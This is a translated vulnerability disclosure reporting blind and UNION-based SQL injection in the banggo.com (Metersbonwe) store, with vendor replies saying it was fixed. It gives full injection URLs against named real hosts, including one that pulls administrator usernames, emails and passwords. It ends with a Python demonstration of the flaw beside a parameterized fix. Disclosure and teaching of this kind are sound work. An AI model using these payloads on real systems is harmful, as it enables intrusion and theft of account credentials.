A blind injection in the Metersbonwe official store. Credit to the vendor: the vulnerability was responded to and fixed quickly, and anti-injection filtering was added. It took a long time to find this small problem. Please fix it once more...
http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23
The order parameter is blind-injectable: the returned comments are sorted differently for when 1=1 and for when 1=2, so the sort order reveals whether the condition is true.
http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175
Injection also exists here, but it does not seem to be exploitable. Various SQL statements can be tested after it. Note that spaces are replaced with %0a... (presumably a firewall has been added).
Solution:
One more fix and it will be perfect..
Second: a union injection in the Metersbonwe official mall
Detailed Description: injection point:
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%28%,user%29%23
Open_user@10.80.30.240"
Query the administrator table:
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%,,2,concat%28user_id,0x7c,user_name,0x7c,%20email,0x7c,password%29%20from%20system_admin_user%23
Check the member table (only an account I registered myself was checked, confirming that it sits in the same database as the member data):
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%,,2,concat%28user_id,0x7c,email,0x7c,%20user_name,0x7c,password%29%20from%20user_users%20where%20user_name%20like%200x616161616161616263%20limit%201%23
I think the store should separate member data from the website to ensure the security of member data.
Solution:
Understood! Numeric-type injection; pay attention to it...
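Both findings above come from the same mistake: a request parameter is spliced into the SQL string, once as the ORDER BY expression (the CASE/when payload) and once as a numeric position/id. The following is an added example, not code from the report or from the site, showing the pattern beside its fix in Python on an in-memory SQLite table with constructed comment rows; the page's ORDER BY payload is used with its %0a newlines decoded and without MySQL's trailing '#' (SQLite has no '#' comment). A numeric id can be bound as a parameter; a sort column cannot, so it is mapped through an allow-list instead.

```python
import sqlite3

# Constructed sample data (not from the page): three comments on one product whose
# add_time order differs from their is_help order, so a swapped sort column is visible.
COMMENTS = [
    (1, 556375, "2012-04-01", 5),
    (2, 556375, "2012-04-03", 1),
    (3, 556375, "2012-04-02", 9),
]

# Allow-list for the `order` parameter: request value -> real column name.
ALLOWED_ORDER = {"add_time": "add_time", "is_help": "is_help"}


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER, good_id INTEGER, add_time TEXT, is_help INTEGER)")
    conn.executemany("INSERT INTO comments VALUES (?, ?, ?, ?)", COMMENTS)
    return conn


def vulnerable_order(good_id, order):
    """Reproduces the bug: both parameters are spliced into the SQL text unchecked, so a
    CASE expression in `order` changes the sort column depending on its condition."""
    sql = f"SELECT id FROM comments WHERE good_id = {good_id} ORDER BY {order}"
    return [row[0] for row in _db().execute(sql)]


def safe_order(good_id, order):
    """Hardened form: good_id is coerced to int and bound as a parameter; the sort
    column cannot be bound, so it is looked up in ALLOWED_ORDER instead."""
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError(f"unsupported sort column: {order!r}")
    sql = f"SELECT id FROM comments WHERE good_id = ? ORDER BY {column}"
    return [row[0] for row in _db().execute(sql, (int(good_id),))]


def rejects(good_id, order):
    """True when the hardened handler refuses the request (non-numeric id or unknown column)."""
    try:
        safe_order(good_id, order)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    true_case = "(case when (1=1) then add_time else is_help end)"
    false_case = "(case when (1=2) then add_time else is_help end)"
    print(vulnerable_order(556375, true_case), vulnerable_order(556375, false_case))  # [1, 3, 2] [2, 1, 3]
    print(rejects(556375, true_case), rejects("175) and 1=2", "add_time"))  # True True
```

The differing id lists from the vulnerable builder are exactly the oracle the report describes; the hardened builder returns the same rows for legitimate sort names and refuses anything else before it reaches the database.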
Author kobin97